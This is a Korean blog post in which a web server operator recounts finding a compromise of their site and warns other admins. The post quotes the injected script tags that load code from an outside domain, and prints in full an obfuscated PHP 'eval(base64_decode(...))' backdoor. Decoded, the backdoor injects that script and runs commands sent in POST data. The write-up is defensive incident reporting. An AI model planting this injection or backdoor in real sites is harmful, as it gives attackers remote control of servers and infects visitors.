[해킹차단] 이런창이 뜨는 사이트들 정말 조심하길 바란다.

혹시 서버를 운영중이시라면 아래의 글을 참고로 하여 자신의 컴퓨터를 점검해주세요.

 

호기심에라도 아래의 코드는 클릭하지 마시고, 일부러 링크가 안되게 ..... 을 추가 시켰습니다.

무리하게 들어가지 말아주세요. ^^;;

 

구글크롬이 그나마 안전한 브라우저라 생각되어 웹검색은 크롬으로 하고 있는데, 구글크롬에서 상당히 자주볼 수 있는 국내 웹사이트들...

 

특히나 뉴스사이트들이다.

 

일단 아래의 경고메시지들은 해당사이트에 악성코드를 제공하는 이미지파일이나 스크립트 문구가 있으면 나타나는 문구이다.

 

 

 

헌데 어느날 갑자기 내 사이트에서도 저런 문구가 나타나기 시작했다.

처음에는 대수롭지 않게 보다가 자꾸 찜찜,,,

 

웹페이지 소스를 뒤져보니,

<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

 

등이 삽입되어 있는것이 아닌가?

 

어떤 노무새퀴?가 이런짓을???

 

 

우선 웹관련 파일인 *.js *.php *.htm 파일들에 thaizucht.de와 스팸모음 자료들을 토대로 하나씩 찾기 시작했다.

 

 

common/js폴더의 파일을 비롯 *.js 파일에

document.write('<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ><\/script>);

라고 254개의 파일에 넣어놨고,

 

htm, html 파일에는
<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

라고 7개의 파일에 넣어놨고,

 

php 파일에는

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbGxrcycpKXtmdW5jdGlvbiBsbGtzKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSb1lXbDZkV05vZEM1a1pTOW5abmd2ZEdobmNsOXdjbU5mYkc5bkxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBsbGtzMigkYSwkYiwkYywkZCl7Z2xvYmFsJGxsa3MxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRsbGtzMSkpY2FsbF91c2VyX2Z1bmMoJGxsa3MxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdsbGtzJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbGxrcycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRsbGtzbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGxrczInKSkhPSdsbGtzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

라는 코드를 16개의 파일에 넣어놨다.

전체적으로 thaizucht.de 이 단어가 들어간 사이트를 추적해보았다,,,

총 9개가 더 발견..

 

 

 

 

 

이후 바이러스 검사까지 완료!

 

 

 

 

 

 

하루가 지나고 다음날,,,

 

허걱~~~

 

또 악성코드가???

 

우찌된 일이지?

 

 

아파치웹서버로그를 별도로 저장하지 않는터라, 다른 로그기록을 찾아보았다.

 

우선 파일부터 검색해봐야겠다.

 

혹시 날짜가 어떻게 바뀌었나?

 

분명 코드를 수정했으면 날짜가 바꼇을 터!!!~

 

오전 8시까지만해도 괜찮던것이 오후 8:52 ~ 8:53분에 일괄적으로 코드 수정됨...

파일 날짜가 이 시간대로 바뀐것들은 죄다 코드가 수정되어 있었고, 분명 Telnet과 FTP도 껏는데 우째 다시 실행되어 있다?

 

재부팅된 시간이 언제인가를 정확히 파악하기 위해서 PhpMyadmin의 상태를 보았다.

 

"이 MySQL 서버는 0 days, 16 hours, 48 minutes and 14 seconds 동안 구동되었습니다.
구동 시작날짜는 10-05-03 15:15 입니다."

 

어제 마지막으로 건드린 시간이었다.

결국 재부팅은 되지 않았으며, 일괄자료를 수정한 것으로 보이는데, 시간대가 비슷한 시간대인것으로 보아 FTP 로 접속한 듯...~~~ 음...,,

 

내 FTP비밀번호가 노출되었나?

일단 FTP서버도 차단시키고, 아이디도 몽땅 바꿨다.

 

다시 하루가 지나봐야 할 듯한데...

음,,, 여러분들의 서버에 혹시 침입자가 있지 않은지 확인해보세요.

위의 내용들은 구글 검색사이트에서 조차 나오지 않더군요.

 

알려지지 않은 또는 서버 운영자들도 잘 모르고 있었던 부분이 아닌가 싶네요.